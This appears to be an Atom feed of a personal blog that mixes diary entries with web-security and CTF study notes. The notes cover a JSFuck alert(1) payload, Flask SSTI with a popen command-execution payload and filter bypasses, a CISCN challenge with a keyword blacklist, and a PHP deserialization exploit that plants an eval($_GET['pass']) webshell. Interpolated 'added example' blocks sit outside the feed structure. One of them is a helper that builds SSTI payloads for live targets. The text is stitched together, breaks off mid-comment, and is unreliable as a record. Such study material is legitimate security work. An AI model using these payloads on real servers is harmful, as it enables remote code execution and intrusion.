<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>fogpost's little blog</title>
<link href="https://fogpost.top/atom.xml" rel="self"/>
<link href="https://fogpost.top/"/>
<updated>2026-01-06T12:54:22.146Z</updated>
<id>https://fogpost.top/</id>
<author>
<name>fogpost</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>diary</title>
<link href="https://fogpost.top/2026/01/05/diary-2026-1-4/"/>
<id>https://fogpost.top/2026/01/05/diary-2026-1-4/</id>
<published>2026-01-04T16:00:00.000Z</published>
<updated>2026-01-06T12:54:22.146Z</updated>
<content type="html"><![CDATA[<h1 id="2026-1-4-13-04-05"><a href="#2026-1-4-13-04-05" class="headerlink" title="2026_1_4 13:04:05"></a>2026_1_4 13:04:05</h1><ul><li><p>Sharing a site today:<br><a href="https://idcflare.com/">idcflare</a><br><img src="https://gitee.com/fogpost/photo/raw/master/202601041333515.png" srcset="/img/loading.gif" lazyload alt="screenshot of the site"><br>A pretty good resource-sharing site whose aim is to get back to the internet as it was at the very start. I have had enough of CSDN.</p></li><li><p>Continued C coding today, finishing roughly one chapter, about ten exercises.<br>In the afternoon I went to get my eyes checked and bought new shoes. The eye results are in: conjunctivitis. Apply some medication and go to bed earlier; no more staying up late, I need more rest every day.</p></li><li><p>Continued reading and writing up the Win32 API book. I basically only finished the preface and got a sense of the basic learning path; I plan to finish the book this month. Over the last two days I found a lot more material, but really I do not need to look for anything new; better to finish the old material on my own study site first.</p></li><li><p>I still feel the posts need more words. I should revise my articles repeatedly, and each one should run to at least 400-500 characters.</p></li></ul><h1 id="2026-1-5-19-48-56"><a href="#2026-1-5-19-48-56" class="headerlink" title="2026_1_5 19:48:56"></a>2026_1_5 19:48:56</h1><ul><li><p>If I am going to pad the word count, I will make this post longer first and split it up later once I have more ideas. After that I need to tidy up the earlier articles properly; a lot of the junk and unfinished pieces can be cleaned up, and I should use drafts more. I only started writing code this afternoon and I am still drowsy; I cannot write much each day, I do not know whether I will finish today's six exercises, and I have not started on the book.</p></li><li><p>I really feel it is easier to study at school. At home, someone comes over in the afternoon and it is deafening, so nothing gets done. I wanted to sleep but now I am groggy, so I will take a short nap and then start coding.</p></li><li><p>Another idea: I could post my own code here, provided it is somewhat interesting; otherwise it is just filler. Oh, and last night I was still thinking about my video plan. I intend to publish one article every Saturday and Sunday; a 15-20 minute video needs a script of about 5000 characters, so I will have to find time to write scripts. So many things to do, and I have not done anything this morning.</p></li><li><p>I forgot to mention the information-feed thing; I also still have the graduation project and that network design to do, both of which I had forgotten. Later I need to add external links and RSS to the site too; I do not know whether I forgot to add them before or what. Oh, and later I want to rebuild the site with Django, probably a few months from now. Anyway, that is it for now.</p></li></ul><h1 id="2026-1-6-20-53-34"><a href="#2026-1-6-20-53-34" class="headerlink" title="2026_1_6 20:53:34"></a>2026_1_6 20:53:34</h1><ul><li>Just looked at obstain's fully automated local-network auto-upload; it really is good. The update on this blog also has some issues, so I do not expect to post for the next few days and will focus on update-related content. Looking forward to seeing everyone next week.</li></ul>]]></content>
<category term="diary" scheme="https://fogpost.top/tags/diary/"/>
</entry>
<entry>
<title>A new start</title>
<link href="https://fogpost.top/2025/12/25/%E6%96%B0%E7%9A%84%E5%BC%80%E5%A7%8B/"/>
<id>https://fogpost.top/2025/12/25/%E6%96%B0%E7%9A%84%E5%BC%80%E5%A7%8B/</id>
<published>2025-12-25T07:49:59.000Z</published>
<updated>2025-12-25T08:01:58.022Z</updated>
<content type="html"><![CDATA[<h2 id="过去的总结"><a href="#过去的总结" class="headerlink" title="过去的总结"></a>Looking back</h2><p>Now that the postgraduate entrance exam is behind me, there is a lot to look at, so let me set the tone first: the blog still has to move over to Hexo. Notion was convenient, but it felt lacking in places; in the end, native and self-owned is better. In Marxist-philosophy terms, the negation of the negation.</p><h2 id="之后的目标"><a href="#之后的目标" class="headerlink" title="之后的目标"></a>Goals from here</h2><p>A few goals, ordered by urgency.</p><h3 id="急迫"><a href="#急迫" class="headerlink" title="急迫"></a>Urgent</h3><ol><li>C programming on January 15, coming right up</li><li>The graduation project</li></ol><h3 id="中等"><a href="#中等" class="headerlink" title="中等"></a>Medium</h3><ol><li>Finish the book C++反汇编与逆向分析 (C++ disassembly and reverse analysis)</li><li>Reverse more of the C I write myself</li><li>pwpw and wewe</li></ol><h3 id="较弱"><a href="#较弱" class="headerlink" title="较弱"></a>Low</h3><ol><li>Finish witch3</li></ol><h3 id="额外目标"><a href="#额外目标" class="headerlink" title="额外目标"></a>Extra goals</h3><ol><li>Rebuild my blog with Django</li><li>Write a CTF aggregator site</li></ol><h3 id="变成习惯"><a href="#变成习惯" class="headerlink" title="变成习惯"></a>Make a habit of</h3><ul><li>Studying English</li></ul><p>That is it for now. I will gradually upload the Notion material and the past few months' notes to the site.</p>]]></content>
<category term="diary" scheme="https://fogpost.top/tags/diary/"/>
</entry>
<entry>
<title>2025</title>
<link href="https://fogpost.top/2025/02/24/2025/"/>
<id>https://fogpost.top/2025/02/24/2025/</id>
<published>2025-02-24T09:09:48.000Z</published>
<updated>2025-02-24T09:30:54.309Z</updated>
<content type="html"><![CDATA[<p>In the blink of an eye it is 2025. Last year's worries have not faded and this year's have already come knocking. This post is part encouragement, part warning. It is not that I am so busy; there really is not that much, but the following is what needs doing now:</p><ul><li><p>Finish the programming course</p></li><li><p>Keep studying web security to prepare for the coming hvv</p></li><li><p>Get everything ready for the postgraduate entrance exam<br>There are hardly any classes this semester, so there is time to improve on the technical side; I will add the rest as it comes to me.<br>ps: exercise has to keep up too. I always want to play games and cannot help playing instead of improving myself; that counts as something to fix as well.</p></li><li><p>Personal skills<br><img src="https://gitee.com/fogpost/photo/raw/master/202502241730506.png" srcset="/img/loading.gif" lazyload></p></li></ul>]]></content>
</entry>
<entry>
<title>A little JS knowledge for web</title>
<link href="https://fogpost.top/2025/01/11/web%E7%9A%84js%E5%B0%8F%E7%9F%A5%E8%AF%86/"/>
<id>https://fogpost.top/2025/01/11/web%E7%9A%84js%E5%B0%8F%E7%9F%A5%E8%AF%86/</id>
<published>2025-01-11T02:51:32.000Z</published>
<updated>2025-01-11T02:53:45.102Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>A JavaScript primer. Plenty of small browser games are written in JS, and a related curiosity is JSFuck, below.<br>JavaScript is one of the three languages every web developer has to learn:<br> HTML defines the content of a page<br> CSS describes its layout<br> JavaScript controls its behaviour</p><h2 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h2><pre><code class="hljs javascript">[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
</code></pre><p>This snippet is <code>alert(1)</code> written with only the six characters <code>[]()!+</code>; paste it into the browser developer tools console and run it. It evaluates to <code>[]["filter"]["constructor"]("alert(1)")()</code>, that is <code>Function("alert(1)")()</code>: every character is picked out of the strings that <code>false</code>, <code>true</code>, <code>undefined</code> and <code>Array.prototype.filter</code> turn into when coerced with <code>+[]</code>.</p>]]></content>
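<![CDATA[<p>As an added example that is not part of the original post: a small JSFuck encoder, so you can see where each character of <code>alert(1)</code> above comes from, and a decoder that recovers the hidden source of such a payload without executing it. The encoder only knows the letters needed here (plus digits and the characters carved out of the string form of <code>Array.prototype.filter</code>); the <code>function filter() { [native code] }</code> string it relies on is V8's, so it runs in Node or Chromium. The names <code>jsfuck</code>, <code>recoverSource</code> and the hook on <code>filter</code>/<code>flat</code> are this example's own, not from any library.</p>

```javascript
// Added example, not from the original post: a minimal JSFuck encoder
// (to show where each character of alert(1) comes from) and a decoder
// that recovers the hidden source of a payload without executing it.
//
// Every JSFuck program is []["filter"]["constructor"](SRC)(), that is
// Function(SRC)(). Characters are carved out of the strings that false,
// true, undefined and a native function turn into when coerced with +[].

const FALSE = '(![]+[])';      // "false"
const TRUE = '(!![]+[])';      // "true"
const UNDEF = '([][[]]+[])';   // "undefined"

// Integer k as a JSFuck expression: 0 -> +[], 1 -> +!+[], 2 -> !+[]+!+[] ...
// Two-digit indices are string concatenations, e.g. 10 -> +!+[]+[+[]].
function num(k) {
  if (k === 0) return '+[]';
  if (k === 1) return '+!+[]';
  if (k < 10) return Array(k).fill('!+[]').join('+');
  return num(Math.floor(k / 10)) + '+[' + num(k % 10) + ']';
}

const charAt = (strExpr, k) => strExpr + '[' + num(k) + ']';

// Letters available before any function is involved.
const ATOMS = {
  f: charAt(FALSE, 0), a: charAt(FALSE, 1), l: charAt(FALSE, 2),
  s: charAt(FALSE, 3), e: charAt(FALSE, 4),
  t: charAt(TRUE, 0), r: charAt(TRUE, 1), u: charAt(TRUE, 2),
  n: charAt(UNDEF, 1), d: charAt(UNDEF, 2), i: charAt(UNDEF, 5),
};

function encode(text) {
  return [...text].map((ch) => {
    if (ch >= '0' && ch <= '9') return '[' + num(Number(ch)) + ']'; // [1]+'' === '1'
    if (!(ch in ATOMS)) throw new Error('no JSFuck atom for ' + JSON.stringify(ch));
    return ATOMS[ch];
  }).join('+');
}

// [] ["filter"] is Array.prototype.filter; coerced to a string it reads
// "function filter() { [native code] }" in V8, which supplies c, o, ( and ).
const FILTER = '[][' + encode('filter') + ']';
const FILTER_STR = '(' + FILTER + '+[])';
Object.assign(ATOMS, {
  c: charAt(FILTER_STR, 3), o: charAt(FILTER_STR, 6), ' ': charAt(FILTER_STR, 8),
  '(': charAt(FILTER_STR, 15), ')': charAt(FILTER_STR, 16),
});

// Encoder: the same shape as the payload in the post.
function jsfuck(source) {
  return FILTER + '[' + encode('constructor') + '](' + encode(source) + ')()';
}

// Decoder: JSFuck reaches Function through <native fn>.constructor, which is
// inherited from Function.prototype. Shadowing that property on the methods
// encoders use ("filter" here, "flat" in newer encoders) turns Function(SRC)
// into a logger, so evaluating the payload builds the strings and hands SRC
// to us instead of compiling it.
function recoverSource(payload) {
  const captured = [];
  const stub = (...args) => {
    captured.push(String(args[args.length - 1])); // Function(...params, body)
    return () => undefined;                        // the trailing () call lands here
  };
  const hooked = ['filter', 'flat']
    .map((name) => Array.prototype[name])
    .filter((fn) => typeof fn === 'function');
  for (const fn of hooked) {
    Object.defineProperty(fn, 'constructor', { value: stub, configurable: true, writable: true });
  }
  try {
    (0, eval)(payload); // indirect eval: global scope, only string building happens
  } finally {
    for (const fn of hooked) delete fn.constructor; // restore the prototype chain
  }
  return captured;
}
```

<p>Usage: <code>recoverSource(jsfuck('alert(1)'))</code> returns <code>['alert(1)']</code>, and applied to the payload in the post it returns the same; nothing runs, because the stub stands in for <code>Function</code> for the duration of the call. Do not use this in a page you care about: it patches shared prototypes, so run it in a throwaway Node process or a blank tab.</p>
]]>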
<category term="WEB" scheme="https://fogpost.top/categories/WEB/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>Flask template injection</title>
<link href="https://fogpost.top/2025/01/10/flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/"/>
<id>https://fogpost.top/2025/01/10/flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/</id>
<published>2025-01-10T06:50:20.000Z</published>
<updated>2025-01-11T02:47:58.558Z</updated>
<content type="html"><![CDATA[<h1 id="flask模板注入"><a href="#flask模板注入" class="headerlink" title="flask模板注入"></a>Flask template injection</h1><p>As one of the harder topics in web security, this is worth going through.<br>Reference: <a href="https://xz.aliyun.com/t/3679?time__1311=n4+xnii=oGqmqDK0QDODlx6e0=bG=KtezkWGb84D">flask之ssti模版注入从零到入门</a> (Flask SSTI from zero to entry level)</p><h2 id="模板代码"><a href="#模板代码" class="headerlink" title="模板代码"></a>Template code</h2><p>The code is Python on the Flask framework with Jinja2 templates; Flask and Jinja2 have to be installed separately (PyCharm may make this easier).<br>Note: <code>index</code> has no injection point; the vulnerable point is in <code>test</code>, where <code>request.url</code> is formatted into the template text before it is rendered, so whatever the client puts in the URL, query string included, becomes part of the template source.</p><pre><code class="hljs python">from flask import Flask
from flask import render_template
from flask import request
from flask import render_template_string

app = Flask(__name__)

@app.route('/')
@app.route('/index')  # both / and /index are served by this view
def index():
    return render_template("index.html", title='Home', user=request.args.get("key"))

@app.route('/test', methods=['GET', 'POST'])
def test():
    # Vulnerable: the request URL is spliced into the template *source*,
    # so {{ ... }} in the URL is parsed and executed by Jinja2.
    template = '''
        &lt;div class="center-content error"&gt;
            &lt;h1&gt;Oops! That page doesn't exist.&lt;/h1&gt;
            &lt;h3&gt;%s&lt;/h3&gt;
        &lt;/div&gt;
    ''' % request.url

    return render_template_string(template)

if __name__ == '__main__':
    app.debug = True
    app.run()
</code></pre><h3 id="示例-index-html"><a href="#示例-index-html" class="headerlink" title="示例 index.html"></a>Example <code>index.html</code></h3><pre><code class="hljs html">&lt;html&gt;
    &lt;head&gt;
        &lt;title&gt;{{ title }} - 小猪佩奇&lt;/title&gt;
    &lt;/head&gt;
    &lt;body&gt;
        &lt;h1&gt;Hello, {{ user.name }}!&lt;/h1&gt;
    &lt;/body&gt;
&lt;/html&gt;
</code></pre><h3 id="SSTI-利用示例"><a href="#SSTI-利用示例" class="headerlink" title="SSTI 利用示例"></a>SSTI exploitation example</h3><p>Using Python's class hierarchy we can walk from a string literal up to <code>object</code> and from there into any loaded class and the functions in its module globals.<br>The usual gadget is <code>&lt;class 'os._wrap_close'&gt;</code>; its position in <code>__subclasses__()</code> differs between versions, and is <code>133</code> on Python 3.8. The parameter name <code>key</code> does not matter here, since the whole URL is interpolated.</p><pre><code class="hljs text">http://127.0.0.1:5000/test?key={{"".__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('dir').read()}}
</code></pre><p><img src="https://gitee.com/fogpost/photo/raw/master/202501101750658.png" srcset="/img/loading.gif" lazyload></p><h2 id="CTF-中的一些绕过-Tips"><a href="#CTF-中的一些绕过-Tips" class="headerlink" title="CTF 中的一些绕过 Tips"></a>Some bypass tips for CTF</h2><ol><li><p><strong><code>[]</code> and other brackets filtered</strong><br>Use <code>__getitem__</code> instead. Original POC: <code>{{"".__class__.__bases__[0]}}</code><br>Bypassed: <code>{{"".__class__.__bases__.__getitem__(0)}}</code></p></li><li><p><strong><code>subclasses</code> filtered: split the string</strong><br>Original POC: <code>{{"".__class__.__bases__[0].__subclasses__()}}</code><br>Bypassed: <code>{{"".__class__.__bases__[0]['__subcla' + 'sses__']()}}</code></p></li><li><p><strong><code>class</code> filtered</strong><br>Go through <code>session</code>:<br>POC: <code>{{session['__cla' + 'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0].__subclasses__()[133]}}</code></p><p>The repeated <code>__bases__[0]</code> walks up the hierarchy until it reaches <code>object</code>. <code>__mro__</code> gets there more conveniently: </p><ul><li><code>{{session['__cla' + 'ss__'].__mro__[12]}}</code><br>or </li><li><code>{{request['__cl' + 'ass__'].__mro__[12]}}</code></li></ul></li></ol><!-- 4. **`timeit` 姿势** --><p>Example: <a href="https://www.secpulse.com/archives/65568.html">a Python sandbox challenge from SWPU-CTF 2017</a></p><h2 id="一张图总结一下-SSTI-的一些模板渲染引擎及利用"><a href="#一张图总结一下-SSTI-的一些模板渲染引擎及利用" class="headerlink" title="一张图总结一下 SSTI 的一些模板渲染引擎及利用"></a>One picture summarising SSTI across template engines and their exploitation</h2><p><img src="https://gitee.com/fogpost/photo/raw/master/202501101756362.png" srcset="/img/loading.gif" lazyload></p>]]></content>
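<![CDATA[<p>As an added example, not code from the post or from the referenced article: the two things a reader of the section above most needs to check, in plain Python with no Flask or Jinja2 installed. First, the root cause: <code>request.url</code> is formatted into the template text, so <code>{{ ... }}</code> from the client becomes template source and the parameter name <code>key</code> is irrelevant; the fixed version keeps the template constant and passes the URL as a context variable. Second, the <code>133</code> in the payload is only where <code>os._wrap_close</code> happens to sit in <code>object.__subclasses__()</code> on the author's Python 3.8; the helper below finds that index (and any other class whose <code>__init__</code> globals expose <code>popen</code>) on whatever interpreter it runs on and builds the payload from it. The function names and the <code>ERROR_TEMPLATE</code> constant are this example's own.</p>

```python
"""Added example (not the post's or the referenced article's code).

Checks two things the writeup leaves implicit, in plain Python, no Flask or
Jinja2 required:
1. Why the `test` view is injectable: request.url is formatted into the
   template *source* before render_template_string() sees it.
2. Where the hard-coded `__subclasses__()[133]` comes from, and how to find
   the right index on any interpreter instead of guessing.
"""
import os  # makes sure os._wrap_close is among object's subclasses

# Same template text as the post's `test` view (the constant name is ours).
ERROR_TEMPLATE = """
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>%s</h3>
    </div>
"""


def unsafe_template_source(url):
    """The vulnerable pattern: client text becomes Jinja2 code."""
    return ERROR_TEMPLATE % url


def safe_render_inputs(url):
    """The fix: constant template, URL passed as data.

    Returns (source, context) as you would hand them to
    render_template_string(source, **context). Jinja2 then treats `url`
    as a string value and, under Flask's autoescaping, HTML-escapes it.
    """
    return ERROR_TEMPLATE.replace("%s", "{{ url }}"), {"url": url}


def object_subclasses():
    """The walk the payload performs: "".__class__.__bases__[0] is `object`."""
    return "".__class__.__bases__[0].__subclasses__()


def find_gadget_indices(global_name="popen"):
    """(index, class name) for every object subclass whose __init__ is a
    Python function defined in a module that has `global_name` in its
    globals. For "popen" that is os._wrap_close, the post's index 133."""
    hits = []
    for index, cls in enumerate(object_subclasses()):
        try:
            globs = getattr(cls.__init__, "__globals__", None)  # C slots have none
        except Exception:  # exotic metaclasses: skip rather than abort the scan
            continue
        if isinstance(globs, dict) and global_name in globs:
            hits.append((index, cls.__name__))
    return hits


def gadget(index, global_name="popen"):
    """The callable the payload ends up invoking for a given index."""
    return object_subclasses()[index].__init__.__globals__[global_name]


def build_payload(index, command="id", global_name="popen"):
    """The post's payload with the version-specific index filled in."""
    return (
        '{{"".__class__.__bases__[0].__subclasses__()[%d]'
        ".__init__.__globals__['%s']('%s').read()}}"
    ) % (index, global_name, command)


if __name__ == "__main__":
    for index, name in find_gadget_indices("popen"):
        print(index, name, build_payload(index))
```

<p>Usage: <code>find_gadget_indices("popen")</code> returns a list such as <code>[(n, '_wrap_close')]</code>; feed <code>n</code> to <code>build_payload</code> and you have the post's URL payload with the index that matches the target's Python version. Against a live target you confirm the index the same way, by rendering <code>{{"".__class__.__bases__[0].__subclasses__()[n]}}</code> and checking that the page shows <code>&lt;class 'os._wrap_close'&gt;</code>. The fix in <code>safe_render_inputs</code> is what the <code>test</code> view should do: <code>render_template_string(source, **context)</code>.</p>
]]>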
<category term="WEB" scheme="https://fogpost.top/categories/WEB/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>CISCN writeup reproduction</title>
<link href="https://fogpost.top/2025/01/10/ciscnwp%E5%A4%8D%E7%8E%B0/"/>
<id>https://fogpost.top/2025/01/10/ciscnwp%E5%A4%8D%E7%8E%B0/</id>
<published>2025-01-10T06:33:04.000Z</published>
<updated>2025-01-11T02:48:35.109Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>Working up the courage to face CISCN and slowly reproducing the challenges against the writeups. Keep going.</p><h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="hello-web"><a href="#hello-web" class="headerlink" title="hello_web"></a>hello_web</h3><p>A classic SSRF. We actually had most of it done, but got stuck at the AntSword bypass and never got the chain all the way through. I wrote a separate article on the AntSword bypass, so I will not repeat it here. The challenge itself also involves a double-write bypass and a PHP quirk: <code>[</code> in a parameter name is turned into <code>_</code>.</p><h3 id="Safe-Proxy"><a href="#Safe-Proxy" class="headerlink" title="Safe_Proxy"></a>Safe_Proxy</h3><pre><code class="hljs py">from flask import Flask, request, render_template_string
import socket
import threading
import html

app = Flask(__name__)

@app.route('/', methods=["GET"])
def source():
    with open(__file__, 'r', encoding='utf-8') as f:
        return '&lt;pre&gt;'+html.escape(f.read())+'&lt;/pre&gt;'

@app.route('/', methods=["POST"])
def template():
    template_code = request.form.get("code")
    # "security" filter: a substring blacklist
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
    for black in blacklist:
        if black in template_code:
            return "Forbidden content detected!"
    result = render_template_string(template_code)
    print(result)
    return 'ok' if result is not None else 'error'

class HTTPProxyHandler:
    def __init__(self, target_host, target_port):
        self.target_host = target_host
        self.target_port = target_port

    def handle_request(self, client_socket):
        try:
            request_data = b""
            while True:
                chunk = client_socket.recv(4096)
                request_data += chunk
                if len(chunk) &lt; 4096:
                    break

            if not request_data:
                client_socket.close()
                return

            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:
                proxy_socket.connect((self.target_host, self.target_port))
                proxy_socket.sendall(request_data)

                response_data = b""
                while True:
                    chunk = proxy_socket.recv(4096)
                    if not chunk:
                        break
                    response_data += chunk

            # only the body is forwarded; status line and headers are replaced
            header_end = response_data.rfind(b"\r\n\r\n")
            if header_end != -1:
                body = response_data[header_end + 4:]
            else:
                body = response_data

            response_body = body
            response = b"HTTP/1.1 200 OK\r\n" \
                       b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \
                       b"Content-Type: text/html; charset=utf-8\r\n" \
                       b"\r\n" + response_body

            client_socket.sendall(response)
        except Exception as e:
            print(f"Proxy Error: {e}")
        finally:
            client_socket.close()

def start_proxy_server(host, port, target_host, target_port):
    proxy_handler = HTTPProxyHandler(target_host, target_port)
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(100)
    print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")

    try:
        while True:
            client_socket, addr = server_socket.accept()
            print(f"Connection from {addr}")
            thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))
            thread.daemon = True
            thread.start()
    except KeyboardInterrupt:
        print("Shutting down proxy server...")
    finally:
        server_socket.close()

def run_flask_app():
    app.run(debug=False, host='127.0.0.1', port=5000)

if __name__ == "__main__":
    proxy_host = "0.0.0.0"
    proxy_port = 5001
    target_host = "127.0.0.1"
    target_port = 5000

    # "safe" reverse proxy, meant to prevent attacks on the response headers
    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))
    proxy_thread.daemon = True
    proxy_thread.start()

    print("Starting Flask app...")
    run_flask_app()
</code></pre>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>Gathering the courage to face CISCN, slowly reproducing the challenges from the writeups. Keep going!</p>
<h2 id="web"><a href="#web" class="he</summary>
<category term="CTF" scheme="https://fogpost.top/categories/CTF/"/>
<category term="ctf" scheme="https://fogpost.top/tags/ctf/"/>
</entry>
<entry>
<title>bypass</title>
<link href="https://fogpost.top/2025/01/09/bypass/"/>
<id>https://fogpost.top/2025/01/09/bypass/</id>
<published>2025-01-09T02:43:20.000Z</published>
<updated>2025-01-11T02:49:07.679Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>Ran into an unfamiliar bypass at the Great Wall Cup (长城杯) and could not beat it even going all out, so here I am training on it.</p><h2 id="天翼杯-2021-esay-eval"><a href="#天翼杯-2021-esay-eval" class="headerlink" title="[天翼杯 2021]esay_eval"></a><a href="https://www.nssctf.cn/problem/364">[天翼杯 2021]esay_eval</a></h2><figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">A</span></span>{<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$code</span> = <span class="hljs-string">""</span>;<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span>(<span class="hljs-params"><span class="hljs-variable">$method</span>,<span class="hljs-variable">$args</span></span>)</span>{<br> <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>->code);<br> <br> }<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->code = <span class="hljs-string">""</span>;<br> }<br>}<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">B</span></span>{<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>->a-><span class="hljs-title function_ invoke__">a</span>();<br> }<br>}<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'poc'</span>])){<br> <span class="hljs-title function_ invoke__">preg_match_all</span>(<span class="hljs-string">'/"[BA]":(.*?):/s'</span>,<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'poc'</span>],<span class="hljs-variable">$ret</span>);<br> <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$ret</span>[<span class="hljs-number">1</span>])) {<br> <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$ret</span>[<span class="hljs-number">1</span>] <span class="hljs-keyword">as</span> <span class="hljs-variable">$i</span>) {<br> <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$i</span>)!==<span class="hljs-number">1</span>){<br> <span class="hljs-keyword">exit</span>(<span class="hljs-string">"you want to bypass wakeup ? no !"</span>);<br> }<br> }<br> <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'poc'</span>]); <br> }<br><br><br>}<span class="hljs-keyword">else</span>{<br> <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>} <br></code></pre></td></tr></table></figure><p>The input is first run through a regex that captures the number following the class names A and B and requires it to be 1, whereas bypassing __wakeup needs that number to be greater than 1. Since PHP treats class names case-insensitively, the regex can be evaded by changing the case of the class names in the payload.</p><p>A very easy deserialization. The one point to note: when building the payload, rename the classes to a and b so they slip past the regex in the challenge.</p><figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">a</span></span>{<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$code</span> = <span class="hljs-string">""</span>;<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>{<br><span class="hljs-comment">//$this->code="phpinfo();";</span><br> <span class="hljs-variable language_">$this</span>->code=<span class="hljs-string">"eval(\$_GET['pass']);"</span>;<span class="hljs-comment">// write a webshell in</span><br>}<br><br>}<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">b</span></span>{<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$a</span>;<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->a=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">a</span>();<br> }<br>}<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">b</span>());<br><span class="hljs-comment"># Finally change the property count of class b so that it is not 1, which gets around the __wakeup magic method</span><br><span class="hljs-comment">#O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}</span><br><span class="hljs-comment">#change it to 